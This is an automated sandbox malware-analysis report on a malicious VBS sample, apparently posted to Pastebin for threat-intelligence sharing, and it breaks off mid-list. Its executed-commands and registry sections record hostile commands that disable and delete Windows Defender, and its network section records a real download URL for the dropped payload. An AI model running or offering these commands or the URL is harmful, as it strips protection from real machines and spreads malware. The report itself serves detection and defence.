paladin316

VBS_b5964a141f9dbd403f703fabcb67a35d_php_2019-06-26_21_30.json

Jun 26th, 2019
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "VBS_b5964a141f9dbd403f703fabcb67a35d.php"
  7. [*] File Size: 78441
  8. [*] File Type: "Zip archive data, at least v2.0 to extract"
  9. [*] SHA256: "768c9a779430e24806e214136c54f2846a0165fe999a567dbb9d44181c4d7e81"
  10. [*] MD5: "b5964a141f9dbd403f703fabcb67a35d"
  11. [*] SHA1: "69993f8f23add05b683b3f34ee11eb1a973d5055"
  12. [*] SHA512: "c6f9748e0990d2836332bba09d57e642780ccaec467a46209accd24eb1f58f72287c359fffabaa547391fe2f0cfc426b7ebc2ba5f192d21dbab6cea5d6146852"
  13. [*] CRC32: "680AAA93"
  14. [*] SSDEEP: "1536:RL+mf26Li1mrzd/P8Nsh8HBGvdZ6BpJA+NeK8XZqMPUuZh++vuioeOt+BuIAAoCF:Ff26Li1Qmg3dug+oJqMPUuZ/uF5+ZPIw"
  15.  
  16. [*] Process Execution: [
  17. "wscript.exe",
  18. "rst.exe",
  19. "cmd.exe",
  20. "powershell.exe",
  21. "cmd.exe",
  22. "sc.exe",
  23. "cmd.exe",
  24. "sc.exe",
  25. "cmd.exe",
  26. "sc.exe",
  27. "cmd.exe",
  28. "sc.exe",
  29. "cmd.exe",
  30. "powershell.exe",
  31. "svchost.exe",
  32. "services.exe",
  33. "lsass.exe",
  34. "taskhost.exe",
  35. "sc.exe",
  36. "svchost.exe",
  37. "svchost.exe",
  38. "WerFault.exe",
  39. "wermgr.exe"
  40. ]
  41.  
  42. [*] Signatures Detected: [
  43. {
  44. "Description": "At least one process apparently crashed during execution",
  45. "Details": []
  46. },
  47. {
  48. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  49. "Details": [
  50. {
  51. "IP": "67.23.226.169:80"
  52. }
  53. ]
  54. },
  55. {
  56. "Description": "Creates RWX memory",
  57. "Details": []
  58. },
  59. {
  60. "Description": "Possible date expiration check, exits too soon after checking local time",
  61. "Details": [
  62. {
  63. "process": "cmd.exe, PID 2036"
  64. }
  65. ]
  66. },
  67. {
  68. "Description": "A process created a hidden window",
  69. "Details": [
  70. {
  71. "Process": "rst.exe -> cmd"
  72. },
  73. {
  74. "Process": "rst.exe -> cmd"
  75. },
  76. {
  77. "Process": "rst.exe -> cmd"
  78. }
  79. ]
  80. },
  81. {
  82. "Description": "Drops a binary and executes it",
  83. "Details": [
  84. {
  85. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe"
  86. }
  87. ]
  88. },
  89. {
  90. "Description": "Performs some HTTP requests",
  91. "Details": [
  92. {
  93. "url": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov"
  94. }
  95. ]
  96. },
  97. {
  98. "Description": "Attempts to stop active services",
  99. "Details": [
  100. {
  101. "servicename": "WinDefend"
  102. }
  103. ]
  104. },
  105. {
  106. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  107. "Details": [
  108. {
  109. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13851600 times"
  110. }
  111. ]
  112. },
  113. {
  114. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  115. "Details": [
  116. {
  117. "modified_name": "svchost.exe",
  118. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
  119. "original_name": "svchost.exe",
  120. "original_path": "C:\\Windows\\system32\\svchost.exe"
  121. }
  122. ]
  123. },
  124. {
  125. "Description": "Creates a hidden or system file",
  126. "Details": [
  127. {
  128. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP"
  129. }
  130. ]
  131. },
  132. {
  133. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  134. "Details": []
  135. },
  136. {
  137. "Description": "Attempts to disable Windows Defender",
  138. "Details": []
  139. }
  140. ]
  141.  
  142. [*] Started Service: [
  143. "KeyIso",
  144. "WerSvc",
  145. "W32Time"
  146. ]
  147.  
  148. [*] Executed Commands: [
  149. "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
  150. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  151. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  152. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
  153. "cmd /c sc stop WinDefend",
  154. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
  155. "cmd /c sc delete WinDefend",
  156. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
  157. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
  158. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  159. "C:\\Windows\\system32\\svchost.exe",
  160. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  161. "sc stop WinDefend",
  162. "sc delete WinDefend",
  163. "C:\\Windows\\system32\\lsass.exe",
  164. "taskhost.exe $(Arg0)",
  165. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  166. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  167. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  168. "C:\\Windows\\system32\\WerFault.exe -u -p 1376 -s 288",
  169. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\""
  170. ]
  171.  
  172. [*] Mutexes: [
  173. "Local\\ZoneAttributeCacheCounterMutex",
  174. "Local\\ZonesCacheCounterMutex",
  175. "Local\\ZonesLockedCacheCounterMutex",
  176. "Global\\CLR_CASOFF_MUTEX",
  177. "Global\\838B6C9EB27932960",
  178. "Local\\WERReportingForProcess1376",
  179. "Global\\\\xe5\\x88\\x90\\xc2\\xab",
  180. "Global\\\\xe1\\x9f\\xa0\\xc6\\xbb",
  181. "WERUI_BEX64-e0bfc78dc22baf57413d9e3a2494cb68424d695b"
  182. ]
  183.  
  184. [*] Modified Files: [
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
  186. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  187. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  188. "\\??\\PIPE\\srvsvc",
  189. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\II18I4UZ54PZUJWBX0PM.temp",
  190. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
  191. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  192. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
  193. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  194. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  195. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  196. "\\??\\PIPE\\lsarpc",
  197. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
  198. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
  199. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
  200. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
  201. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA153.tmp.appcompat.txt",
  202. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA9EF.tmp.WERInternalMetadata.xml",
  203. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERAA10.tmp.hdmp",
  204. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERB396.tmp.mdmp",
  205. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer",
  206. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
  207. ]
  208.  
  209. [*] Deleted Files: [
  210. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
  211. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3000.32601437",
  212. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3000.32601453",
  213. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3000.32601453",
  214. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
  215. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2220.32602921",
  216. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2220.32602921",
  217. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2220.32602921",
  218. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp",
  219. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
  220. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp",
  221. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
  222. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp",
  223. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
  224. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp",
  225. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
  226. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
  227. ]
  228.  
  229. [*] Modified Registry Keys: [
  230. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  232. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  233. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  234. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  235. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  236. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  237. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
  238. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
  239. "DisableNotifications",
  240. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  241. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  242. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  243. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  246. ]
  247.  
  248. [*] Deleted Registry Keys: [
  249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  250. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  252. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  253. ]
  254.  
  255. [*] DNS Communications: [
  256. {
  257. "type": "A",
  258. "request": "pearlprofessionalmassage.co.nz",
  259. "answers": [
  260. {
  261. "data": "67.23.226.169",
  262. "type": "A"
  263. }
  264. ]
  265. }
  266. ]
  267.  
  268. [*] Domains: [
  269. {
  270. "ip": "67.23.226.169",
  271. "domain": "pearlprofessionalmassage.co.nz"
  272. }
  273. ]
  274.  
  275. [*] Network Communication - ICMP: []
  276.  
  277. [*] Network Communication - HTTP: [
  278. {
  279. "count": 1,
  280. "body": "",
  281. "uri": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov",
  282. "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
  283. "method": "GET",
  284. "host": "pearlprofessionalmassage.co.nz",
  285. "version": "1.1",
  286. "path": "/simpleresuct.gov",
  287. "data": "GET /simpleresuct.gov HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pearlprofessionalmassage.co.nz\r\n\r\n",
  288. "port": 80
  289. }
  290. ]
  291.  
  292. [*] Network Communication - SMTP: []
  293.  
  294. [*] Network Communication - Hosts: []
  295.  
  296. [*] Network Communication - IRC: []
  297.  
  298. [*] Static Analysis: {
  299. "office": {
  300. "Metadata": {
  301. "HasMacros": "No"
  302. }
  303. }
  304. }
  305.  
  306. [*] Resolved APIs: [
  307. "advapi32.dll.SaferIdentifyLevel",
  308. "advapi32.dll.SaferComputeTokenFromLevel",
  309. "advapi32.dll.SaferCloseLevel",
  310. "ole32.dll.CLSIDFromProgIDEx",
  311. "ole32.dll.CoGetClassObject",
  312. "wscript.exe.#1",
  313. "urlmon.dll.#326",
  314. "urlmon.dll.#327",
  315. "shell32.dll.#685",
  316. "shell32.dll.#688",
  317. "urlmon.dll.#395",
  318. "cryptsp.dll.CryptAcquireContextW",
  319. "cryptsp.dll.CryptGenRandom",
  320. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  321. "winhttp.dll.WinHttpCheckPlatform",
  322. "winhttp.dll.WinHttpOpen",
  323. "winhttp.dll.WinHttpConnect",
  324. "winhttp.dll.WinHttpOpenRequest",
  325. "winhttp.dll.WinHttpCloseHandle",
  326. "winhttp.dll.WinHttpSendRequest",
  327. "winhttp.dll.WinHttpReceiveResponse",
  328. "winhttp.dll.WinHttpAddRequestHeaders",
  329. "winhttp.dll.WinHttpQueryHeaders",
  330. "winhttp.dll.WinHttpReadData",
  331. "winhttp.dll.WinHttpWriteData",
  332. "winhttp.dll.WinHttpQueryDataAvailable",
  333. "winhttp.dll.WinHttpQueryOption",
  334. "winhttp.dll.WinHttpSetOption",
  335. "winhttp.dll.WinHttpSetTimeouts",
  336. "winhttp.dll.WinHttpCrackUrl",
  337. "winhttp.dll.WinHttpCreateUrl",
  338. "oleaut32.dll.#8",
  339. "oleaut32.dll.#12",
  340. "shlwapi.dll.StrRChrA",
  341. "shlwapi.dll.StrCmpNW",
  342. "oleaut32.dll.#4",
  343. "oleaut32.dll.#6",
  344. "kernel32.dll.RegQueryValueExW",
  345. "oleaut32.dll.#2",
  346. "kernel32.dll.RegCloseKey",
  347. "oleaut32.dll.#9",
  348. "ws2_32.dll.GetAddrInfoW",
  349. "ws2_32.dll.WSASocketW",
  350. "ws2_32.dll.#2",
  351. "ws2_32.dll.#21",
  352. "ws2_32.dll.#9",
  353. "ws2_32.dll.WSAIoctl",
  354. "ws2_32.dll.FreeAddrInfoW",
  355. "ws2_32.dll.#6",
  356. "ws2_32.dll.#5",
  357. "ws2_32.dll.WSARecv",
  358. "ws2_32.dll.WSASend",
  359. "oleaut32.dll.#202",
  360. "oleaut32.dll.#201",
  361. "ole32.dll.CreateStreamOnHGlobal",
  362. "oleaut32.dll.#411",
  363. "oleaut32.dll.#23",
  364. "oleaut32.dll.#24",
  365. "ole32.dll.GetHGlobalFromStream",
  366. "rpcrt4.dll.RpcBindingFree",
  367. "oleaut32.dll.#500",
  368. "cryptsp.dll.CryptReleaseContext",
  369. "cryptsp.dll.CryptAcquireContextA",
  370. "kernel32.dll.VirtualAlloc",
  371. "ntdll.dll.memcpy",
  372. "kernel32.dll.GetCurrentProcess",
  373. "kernel32.dll.CloseHandle",
  374. "advapi32.dll.OpenProcessToken",
  375. "advapi32.dll.GetTokenInformation",
  376. "kernel32.dll.Wow64EnableWow64FsRedirection",
  377. "advapi32.dll.RegCloseKey",
  378. "advapi32.dll.RegCreateKeyW",
  379. "advapi32.dll.RegOpenKeyExW",
  380. "advapi32.dll.RegSetValueExW",
  381. "shell32.dll.ShellExecuteA",
  382. "ole32.dll.OleInitialize",
  383. "cryptbase.dll.SystemFunction036",
  384. "ole32.dll.CreateBindCtx",
  385. "ole32.dll.CoTaskMemAlloc",
  386. "propsys.dll.PSCreateMemoryPropertyStore",
  387. "propsys.dll.PSPropertyBag_WriteDWORD",
  388. "ole32.dll.CoGetApartmentType",
  389. "ole32.dll.CoRegisterInitializeSpy",
  390. "ole32.dll.CoTaskMemFree",
  391. "comctl32.dll.#236",
  392. "ole32.dll.CoGetMalloc",
  393. "propsys.dll.PSPropertyBag_ReadDWORD",
  394. "propsys.dll.PSPropertyBag_ReadGUID",
  395. "comctl32.dll.#320",
  396. "comctl32.dll.#324",
  397. "comctl32.dll.#323",
  398. "advapi32.dll.RegEnumKeyW",
  399. "advapi32.dll.OpenThreadToken",
  400. "ole32.dll.StringFromGUID2",
  401. "apphelp.dll.ApphelpCheckShellObject",
  402. "ole32.dll.CoCreateInstance",
  403. "urlmon.dll.CreateUri",
  404. "kernel32.dll.InitializeSRWLock",
  405. "kernel32.dll.AcquireSRWLockExclusive",
  406. "kernel32.dll.AcquireSRWLockShared",
  407. "kernel32.dll.ReleaseSRWLockExclusive",
  408. "kernel32.dll.ReleaseSRWLockShared",
  409. "comctl32.dll.#328",
  410. "comctl32.dll.#334",
  411. "shell32.dll.#102",
  412. "propsys.dll.PSPropertyBag_ReadStrAlloc",
  413. "ole32.dll.CoInitializeEx",
  414. "advapi32.dll.InitializeSecurityDescriptor",
  415. "advapi32.dll.SetEntriesInAclW",
  416. "ntmarta.dll.GetMartaExtensionInterface",
  417. "advapi32.dll.SetSecurityDescriptorDacl",
  418. "advapi32.dll.IsTextUnicode",
  419. "comctl32.dll.#332",
  420. "comctl32.dll.#338",
  421. "comctl32.dll.#339",
  422. "ole32.dll.CoUninitialize",
  423. "sechost.dll.ConvertSidToStringSidW",
  424. "profapi.dll.#104",
  425. "propsys.dll.#430",
  426. "advapi32.dll.RegGetValueW",
  427. "ole32.dll.CoTaskMemRealloc",
  428. "propsys.dll.InitPropVariantFromStringAsVector",
  429. "propsys.dll.PSCoerceToCanonicalValue",
  430. "propsys.dll.PropVariantToStringAlloc",
  431. "ole32.dll.PropVariantClear",
  432. "ole32.dll.CoAllowSetForegroundWindow",
  433. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  434. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  435. "shell32.dll.SHGetFolderPathW",
  436. "advapi32.dll.SaferGetPolicyInformation",
  437. "comctl32.dll.#386",
  438. "ntdll.dll.RtlDllShutdownInProgress",
  439. "comctl32.dll.#329",
  440. "ole32.dll.OleUninitialize",
  441. "ole32.dll.CoRevokeInitializeSpy",
  442. "comctl32.dll.#388",
  443. "advapi32.dll.CryptAcquireContextA",
  444. "advapi32.dll.CryptImportKey",
  445. "advapi32.dll.CryptEncrypt",
  446. "cryptsp.dll.CryptImportKey",
  447. "cryptbase.dll.SystemFunction040",
  448. "cryptbase.dll.SystemFunction041",
  449. "cryptsp.dll.CryptEncrypt",
  450. "advapi32.dll.UnregisterTraceGuids",
  451. "comctl32.dll.#321",
  452. "kernel32.dll.SetThreadUILanguage",
  453. "kernel32.dll.CopyFileExW",
  454. "kernel32.dll.IsDebuggerPresent",
  455. "kernel32.dll.SetConsoleInputExeNameW",
  456. "kernel32.dll.SortGetHandle",
  457. "kernel32.dll.SortCloseHandle",
  458. "uxtheme.dll.ThemeInitApiHook",
  459. "user32.dll.IsProcessDPIAware",
  460. "shell32.dll.#66",
  461. "comctl32.dll.#385",
  462. "comctl32.dll.#336",
  463. "comctl32.dll.#333",
  464. "linkinfo.dll.IsValidLinkInfo",
  465. "propsys.dll.#417",
  466. "propsys.dll.PSGetNameFromPropertyKey",
  467. "propsys.dll.PSStringFromPropertyKey",
  468. "propsys.dll.InitVariantFromBuffer",
  469. "propsys.dll.PropVariantToGUID",
  470. "linkinfo.dll.CreateLinkInfoW",
  471. "user32.dll.IsCharAlphaW",
  472. "user32.dll.CharPrevW",
  473. "ntshrui.dll.GetNetResourceFromLocalPathW",
  474. "srvcli.dll.NetShareEnum",
  475. "cscapi.dll.CscNetApiGetInterface",
  476. "slc.dll.SLGetWindowsInformationDWORD",
  477. "shlwapi.dll.PathRemoveFileSpecW",
  478. "linkinfo.dll.DestroyLinkInfo",
  479. "propsys.dll.PropVariantToBoolean",
  480. "advapi32.dll.GetSecurityInfo",
  481. "advapi32.dll.SetSecurityInfo",
  482. "advapi32.dll.GetSecurityDescriptorControl",
  483. "advapi32.dll.RegQueryInfoKeyW",
  484. "advapi32.dll.RegEnumKeyExW",
  485. "advapi32.dll.RegEnumValueW",
  486. "advapi32.dll.RegQueryValueExW",
  487. "shlwapi.dll.UrlIsW",
  488. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  489. "msvcrt.dll._set_error_mode",
  490. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  491. "kernel32.dll.FindActCtxSectionStringW",
  492. "kernel32.dll.GetSystemWindowsDirectoryW",
  493. "mscoree.dll.GetProcessExecutableHeap",
  494. "mscorwks.dll.DllGetClassObjectInternal",
  495. "mscorwks.dll.GetCLRFunction",
  496. "advapi32.dll.RegisterTraceGuidsW",
  497. "advapi32.dll.GetTraceLoggerHandle",
  498. "advapi32.dll.GetTraceEnableLevel",
  499. "advapi32.dll.GetTraceEnableFlags",
  500. "advapi32.dll.TraceEvent",
  501. "mscoree.dll.IEE",
  502. "mscorwks.dll.IEE",
  503. "mscoree.dll.GetStartupFlags",
  504. "mscoree.dll.GetHostConfigurationFile",
  505. "mscoree.dll.GetCORSystemDirectory",
  506. "ntdll.dll.RtlVirtualUnwind",
  507. "kernel32.dll.IsWow64Process",
  508. "advapi32.dll.AllocateAndInitializeSid",
  509. "advapi32.dll.InitializeAcl",
  510. "advapi32.dll.AddAccessAllowedAce",
  511. "advapi32.dll.FreeSid",
  512. "kernel32.dll.SetThreadStackGuarantee",
  513. "kernel32.dll.FlsSetValue",
  514. "kernel32.dll.FlsGetValue",
  515. "kernel32.dll.FlsAlloc",
  516. "kernel32.dll.FlsFree",
  517. "kernel32.dll.AddVectoredContinueHandler",
  518. "kernel32.dll.RemoveVectoredContinueHandler",
  519. "advapi32.dll.ConvertSidToStringSidW",
  520. "kernel32.dll.FlushProcessWriteBuffers",
  521. "kernel32.dll.GetWriteWatch",
  522. "kernel32.dll.ResetWriteWatch",
  523. "kernel32.dll.CreateMemoryResourceNotification",
  524. "kernel32.dll.QueryMemoryResourceNotification",
  525. "kernel32.dll.GlobalMemoryStatusEx",
  526. "ole32.dll.CoGetContextToken",
  527. "oleaut32.dll.#149",
  528. "kernel32.dll.GetUserDefaultUILanguage",
  529. "kernel32.dll.GetVersionExW",
  530. "kernel32.dll.GetFullPathNameW",
  531. "kernel32.dll.SetErrorMode",
  532. "kernel32.dll.GetFileAttributesExW",
  533. "version.dll.GetFileVersionInfoSizeW",
  534. "version.dll.GetFileVersionInfoW",
  535. "version.dll.VerQueryValueW",
  536. "kernel32.dll.lstrlen",
  537. "kernel32.dll.lstrlenW",
  538. "mscoree.dll.ND_RI2",
  539. "kernel32.dll.lstrcpy",
  540. "kernel32.dll.lstrcpyW",
  541. "version.dll.VerLanguageNameW",
  542. "kernel32.dll.GetCurrentProcessId",
  543. "advapi32.dll.LookupPrivilegeValueW",
  544. "advapi32.dll.AdjustTokenPrivileges",
  545. "kernel32.dll.OpenProcess",
  546. "psapi.dll.EnumProcessModules",
  547. "psapi.dll.GetModuleInformation",
  548. "psapi.dll.GetModuleBaseNameW",
  549. "psapi.dll.GetModuleFileNameExW",
  550. "kernel32.dll.GetExitCodeProcess",
  551. "ntdll.dll.NtQuerySystemInformation",
  552. "user32.dll.EnumWindows",
  553. "user32.dll.GetWindowThreadProcessId",
  554. "kernel32.dll.WerSetFlags",
  555. "kernel32.dll.SetThreadPreferredUILanguages",
  556. "kernel32.dll.GetThreadPreferredUILanguages",
  557. "kernel32.dll.GetUserDefaultLocaleName",
  558. "kernel32.dll.GetEnvironmentVariableW",
  559. "advapi32.dll.CryptReleaseContext",
  560. "advapi32.dll.CryptCreateHash",
  561. "advapi32.dll.CryptDestroyHash",
  562. "advapi32.dll.CryptHashData",
  563. "advapi32.dll.CryptGetHashParam",
  564. "advapi32.dll.CryptExportKey",
  565. "advapi32.dll.CryptGenKey",
  566. "advapi32.dll.CryptGetKeyParam",
  567. "advapi32.dll.CryptDestroyKey",
  568. "advapi32.dll.CryptVerifySignatureA",
  569. "advapi32.dll.CryptSignHashA",
  570. "advapi32.dll.CryptGetProvParam",
  571. "advapi32.dll.CryptGetUserKey",
  572. "advapi32.dll.CryptEnumProvidersA",
  573. "cryptsp.dll.CryptHashData",
  574. "cryptsp.dll.CryptGetHashParam",
  575. "cryptsp.dll.CryptDestroyHash",
  576. "cryptsp.dll.CryptDestroyKey",
  577. "mscoree.dll.GetTokenForVTableEntry",
  578. "mscoree.dll.SetTargetForVTableEntry",
  579. "mscoree.dll.GetTargetForVTableEntry",
  580. "culture.dll.ConvertLangIdToCultureName",
  581. "ole32.dll.CoCreateGuid",
  582. "kernel32.dll.CreateFileW",
  583. "kernel32.dll.GetConsoleScreenBufferInfo",
  584. "kernel32.dll.LocalFree",
  585. "kernel32.dll.LocalAlloc",
  586. "mscoree.dll.ND_RI4",
  587. "advapi32.dll.DuplicateTokenEx",
  588. "advapi32.dll.CheckTokenMembership",
  589. "kernel32.dll.GetConsoleTitleW",
  590. "mscorjit.dll.getJit",
  591. "kernel32.dll.SetConsoleTitleW",
  592. "kernel32.dll.SetConsoleCtrlHandler",
  593. "kernel32.dll.CreateEventW",
  594. "ntdll.dll.WinSqmIsOptedIn",
  595. "kernel32.dll.ExpandEnvironmentStringsW",
  596. "shfolder.dll.SHGetFolderPathW",
  597. "kernel32.dll.SetEnvironmentVariableW",
  598. "kernel32.dll.GetACP",
  599. "kernel32.dll.UnmapViewOfFile",
  600. "kernel32.dll.GetFileType",
  601. "kernel32.dll.ReadFile",
  602. "kernel32.dll.GetSystemInfo",
  603. "kernel32.dll.VirtualQuery",
  604. "secur32.dll.GetUserNameExW",
  605. "advapi32.dll.GetUserNameW",
  606. "kernel32.dll.ReleaseMutex",
  607. "advapi32.dll.RegisterEventSourceW",
  608. "advapi32.dll.DeregisterEventSource",
  609. "advapi32.dll.ReportEventW",
  610. "kernel32.dll.GetLogicalDrives",
  611. "kernel32.dll.GetDriveTypeW",
